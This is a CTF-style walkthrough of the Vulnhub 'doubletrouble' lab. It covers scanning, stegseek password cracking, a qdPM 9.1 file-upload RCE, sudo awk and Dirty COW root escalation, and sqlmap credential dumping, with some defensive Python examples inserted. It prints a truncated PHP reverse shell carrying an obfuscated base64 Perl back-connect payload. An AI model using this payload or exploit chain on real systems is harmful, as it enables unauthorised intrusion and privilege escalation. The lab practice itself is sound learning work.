Vulnhub hands-on: doubletrouble target 👻

Time: 2022-4-19


Target download address: https://www.vulnhub.com/entry/doubletrouble-1,743/
Download the .ova file from that page and import it into VMware, or open it in VirtualBox.

Target 1 penetration test

1. Target description

Description
Get the flag
Difficulty: easy
About the VM: tested and exported from VirtualBox. DHCP and nested VT-x/AMD-V are enabled. You can contact me via email for troubleshooting or problems.
This works better on VirtualBox than on VMware.

A small tip: because the .ova file was exported from a VirtualBox virtual machine, it will not receive an IP address if you open it in VMware. VirtualBox names the network card eth followed by a number, while the VMware network card name usually starts with ens, so a virtual machine exported from VirtualBox will not obtain an IP automatically when it is started in VMware. You need to change the network card name to match and then reboot to obtain an IP. If you don't know how to change the network card, refer to the following link:
https://blog.csdn.net/PeterWuu/article/details/105640638
The second step of that tutorial seems to be: rw single init=/bin/bash
It should not be an I; the tutorial writes an I, so maybe the author made a mistake!

2. Host discovery and port scanning

First, import the virtual machine into VMware or VirtualBox. Here I import it into VMware and then start it.

  1. Host detection

nmap -sn 192.168.33.0/24

image

There are many virtual machines on this LAN. If you have many virtual machines on your LAN and can't tell them apart, you can match the IP address to the MAC address, which can be seen in the virtual machine settings.

  2. Perform port scan

nmap -sS -p- -v -O 192.168.33.163

image

We can see that ports 22 and 80 are open, which means SSH and a web service are running. As mentioned in the previous article, you can try to brute-force the SSH username and password with the Hydra tool that comes with Kali. After my last attempt, I found that the chance of success is very small unless a weak password such as admin:123456 is in use.

3. Web service detection

We visit the IP address 192.168.33.163 and get the following page

image

Let's first use dirsearch to scan for directories

python3 dirsearch.py -u 'http://192.168.33.163' -i 200

image

Sure enough, the scan turned up the common directories. Checking them one by one, we found nothing until the /secret/ directory, which contains a picture. A search shows that the stegseek tool can brute-force this picture.
Download reference link: https://www.freebuf.com/sectool/261633.html
Then we use Kali's own rockyou.txt dictionary, which is in Kali's /usr/share/wordlists directory. It is a compressed package and needs to be decompressed first.

stegseek /root/doubletrouble.jpg /usr/share/wordlists/rockyou.txt -xf output

image

After cracking the picture, stegseek writes an output file, and in it we find a username and password. Could they be the username and password for the login page we just saw? Let's try!
After logging in, I found a file upload in my personal settings

image

qdPM vulnerability exploitation

On the login page we can see qdPM 9.1. Searching for vulnerabilities in qdPM 9.1, we find a remote code execution vulnerability: https://www.exploit-db.com/exploits/50175. Download the script. Its line endings are broken, so you need to fix them yourself. The vulnerability itself is quite simple: the picture field of the user's My Account page accepts file uploads, so we can upload a PHP reverse shell script.
I don't know what went wrong here; anyway, I didn't manage to upload the script successfully. If someone succeeds, please let me know. Here I've prepared a PHP reverse shell script; change the IP and port and upload it directly.

'perl','c'=>'c'); 
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
cf('/tmp/.bc',$back_connect); 
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); 
?>

The funny thing here is that whether you run the exploit script or upload the file manually, the feedback from the web page and from the code makes you think the upload failed. An error is reported, but the file has actually been uploaded successfully.
After uploading, the script is in the /uploads/users directory that we saw in the directory scan at the start.

image
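The root cause above is an avatar upload that stores whatever it is given under /uploads/users. The following is an added example, not qdPM's code, showing the checks such an upload handler should perform (extension allowlist, content sniffing, and a server-chosen file name); the sample files are constructed.

```python
import os
import secrets

# Added example, not qdPM's code: how a profile-picture upload handler should
# vet a file so that a PHP script cannot end up under /uploads/users.
# All sample files below are constructed.

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = {  # leading bytes that identify the image types we accept
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
EXT_FOR = {"jpeg": {".jpg", ".jpeg"}, "png": {".png"}, "gif": {".gif"}}
STORE_EXT = {"jpeg": ".jpg", "png": ".png", "gif": ".gif"}

def sniff_image(data):
    """Return the image type named by the file's leading bytes, or None."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None

def validate_avatar(filename, data):
    """Return (accepted, detail). Rejects disallowed extensions, content that
    is not an image, and extension/content mismatches."""
    # Only the last extension counts, so shell.php and shell.jpg.php both fail
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    kind = sniff_image(data)
    if kind is None:  # a PHP file renamed to .jpg fails here
        return False, "content is not a recognised image"
    if ext not in EXT_FOR[kind]:
        return False, f"extension {ext!r} does not match {kind} content"
    return True, kind

def stored_name(kind):
    """Server-chosen name: random stem plus the extension of the sniffed type,
    so the client's file name never reaches the file system."""
    return secrets.token_hex(16) + STORE_EXT[kind]

# Constructed samples: a PHP file and a minimal JPEG/JFIF header
PHP_SAMPLE = b"<?php echo 'not an image'; ?>"
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
```

Serving the upload directory with PHP execution disabled is a separate, complementary control; the checks above stop the file being stored in the first place.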

Then listen on port 10086 on Kali, which is the port set in your script.

nc -lnvp 10086

image

Privilege escalation

Next, let's look at the sudo permissions available to the current user. It shows that the current user can execute the awk command without a password

image

Searching for awk privilege escalation, we find we can run:

sudo awk 'BEGIN {system("/bin/bash")}'

image
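The misconfiguration exploited above is a NOPASSWD sudo rule on a binary that can spawn a shell. The following is an added example, not from the walkthrough, that parses sudo -l output and flags such rules; the sample output is constructed (the www-data user and hostname are assumptions).

```python
import re

# Added audit helper, not from the walkthrough. Flags `sudo -l` entries that
# run as root without a password and name a binary able to spawn a shell.
# The list is illustrative, not exhaustive; awk (the rule on this box) is in it.
SHELL_CAPABLE = {"awk", "gawk", "mawk", "nawk", "vim", "vi", "less", "more",
                 "find", "perl", "python", "python3", "bash", "sh", "env"}

# e.g. "(ALL) NOPASSWD: /usr/bin/awk"  or  "(root) /usr/bin/vim, /bin/less"
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Return (runas, nopasswd, command) tuples from the command section of
    `sudo -l` output; the Defaults section is ignored."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        m = ENTRY_RE.match(line) if in_cmds else None
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            entries.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return entries

def risky_entries(text):
    """Passwordless root-level rules for ALL or for a shell-capable binary."""
    out = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        if not nopasswd or runas.split(":")[0].strip() not in ("ALL", "root"):
            continue
        prog = cmd.split()[0].rsplit("/", 1)[-1]   # basename of the command
        if cmd == "ALL" or prog in SHELL_CAPABLE:
            out.append((runas, cmd))
    return out

# Constructed `sudo -l` output; user and host names are assumptions
SAMPLE_SUDO_L = """Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass

User www-data may run the following commands on doubletrouble:
    (ALL) NOPASSWD: /usr/bin/awk
    (root) /usr/bin/vim
    (ALL) NOPASSWD: /usr/bin/id, /bin/ls
"""
```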

We can see that we are now the root user. Looking in the root folder, we find an .ova file. A search (and a read of other write-ups) shows that this is another virtual machine. Good guy! It lives up to the name doubletrouble and echoes the theme. We download this virtual machine file and open it in VMware.

We start a simple HTTP server on the target machine, download the file with wget on Kali, and then start the new target in VMware. Then follow the previous steps to scan for the host IP, ports and services.

python3 -m http.server 9000

wget http://192.168.33.163:9000/doubletrouble.ova

The following shows the usage of python -m http.server:

image

Target 2 penetration test

1. Host detection

nmap -sn 192.168.33.0/24

image

2. Port, service discovery

nmap -sS -p- -v -O 192.168.33.252

image

3. Web Service Testing

First, through port scanning, we found that port 80 is open, indicating that there is an HTTP service. When we visit the IP address, we see the following login box page:

image

Here we need to enter a username and password, but we don't know either. Scanning the website directory finds no additional information; there is only this one page.

Sqlmap injection to obtain user name and password

We then turn to the powerful tool sqlmap and use it to check whether the login box is injectable. Capture the login request and save it as 1.txt, then run sqlmap in Kali with the following commands:

sqlmap -r /root/1.txt --current-db                          # the database name doubletrouble appears
sqlmap -r /root/1.txt -D doubletrouble --tables             # enumerate tables
sqlmap -r /root/1.txt -D doubletrouble -T users --columns   # enumerate columns
sqlmap -r /root/1.txt -D doubletrouble -T users --dump      # dump the contents

image

image

image

image

We can see two username/password pairs here. The first pair seems useless, and the second can log in over SSH
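What sqlmap is finding in that login box is a query assembled from the submitted values. The following is an added example, not the box's code, that puts a string-built login query next to its parameterised form and shows the simplest signal of injectability (a stray quote breaks the first but not the second); the users table and rows are constructed.

```python
import sqlite3

# Added example, not the box's code: a login query built by string formatting
# (the pattern sqlmap detects) beside the parameterised version.
# The users table and its rows are constructed.

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                "username TEXT, password TEXT)")
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                    [("alice", "s3cret"), ("bob", "hunter2")])
    return con

def login_vulnerable(con, username, password):
    """Values are pasted into the SQL text, so a quote in the input changes
    the structure of the query; this is what sqlmap probes for."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(con, username, password):
    """Placeholders: the driver binds the values separately, so they are
    only ever compared as data, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def quote_probe(login, con):
    """True if a single quote in the username makes the query fail, the
    simplest sign that user input reaches the SQL parser."""
    try:
        login(con, "alice'", "x")
        return False
    except sqlite3.Error:
        return True
```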

ssh [email protected]

image

Privilege escalation

Let's have a look. This user is just an ordinary user. There is a user.txt in the home directory containing a string of characters. Next, we'll find a way to get root and see what's in the root folder. Let's look at the system version first

uname -a

image

Here we have a Dirty COW vulnerability. Vulnerability number: CVE-2016-5195. Type: kernel race condition. Impact: local privilege escalation. Affected range: Linux kernel > 2.6.22. The vulnerability is a race condition in the memory subsystem of the Linux kernel when handling copy-on-write, which can break private read-only memory mappings. After obtaining a low-privileged local user, an attacker can use this vulnerability to gain write access to otherwise read-only memory mappings and go on to obtain root. There are many POCs; the one below creates a root user with the account name firefart: https://github.com/FireFart/dirtycow
We download the POC to the /tmp directory of the target, then compile and execute it.

Because there are no git, wget or yum commands on the target, we create a C file with touch dirty.c, paste the code in, then compile and execute it.

gcc -pthread dirty.c -o dirty -lcrypt
./dirty
su firefart
# In the middle we are asked to enter a password; this becomes firefart's password, and then we can log in

image
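The POC linked above gets root by writing a new uid-0 account into /etc/passwd. As an added check that is not part of the walkthrough, the following parses a copy of /etc/passwd and flags exactly that kind of tampering: extra uid-0 accounts, empty password fields, and password hashes stored in /etc/passwd rather than /etc/shadow. The sample passwd content is constructed and the hash is a placeholder.

```python
# Added post-incident check, not the walkthrough's code. Looks for the traces
# the Dirty COW POC above leaves in /etc/passwd: a second uid-0 account whose
# hash sits in /etc/passwd itself. SAMPLE_PASSWD is constructed.

LOCKED_OR_SHADOWED = {"x", "*", "!", "!!"}   # normal, non-hash password fields

def parse_passwd(text):
    """Parse /etc/passwd lines into dicts; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit():
            continue
        name, pw, uid, gid, gecos, home, shell = parts
        rows.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                     "gecos": gecos, "home": home, "shell": shell})
    return rows

def audit_passwd(text):
    """Return a list of (finding, account) tuples."""
    findings = []
    for r in parse_passwd(text):
        if r["uid"] == 0 and r["name"] != "root":
            findings.append(("extra uid 0 account", r["name"]))
        if r["pw"] == "":
            findings.append(("empty password field", r["name"]))
        elif r["pw"] not in LOCKED_OR_SHADOWED:
            findings.append(("password hash stored in /etc/passwd", r["name"]))
    return findings

# Constructed sample; the hash value is a placeholder, not a real crypt string
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
firefart:PLACEHOLDERHASH:0:0:pwned:/root:/bin/bash
user1:x:1000:1000::/home/user1:/bin/bash
"""
```

On a live host, run audit_passwd over the contents of /etc/passwd; an empty result is the expected state.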


image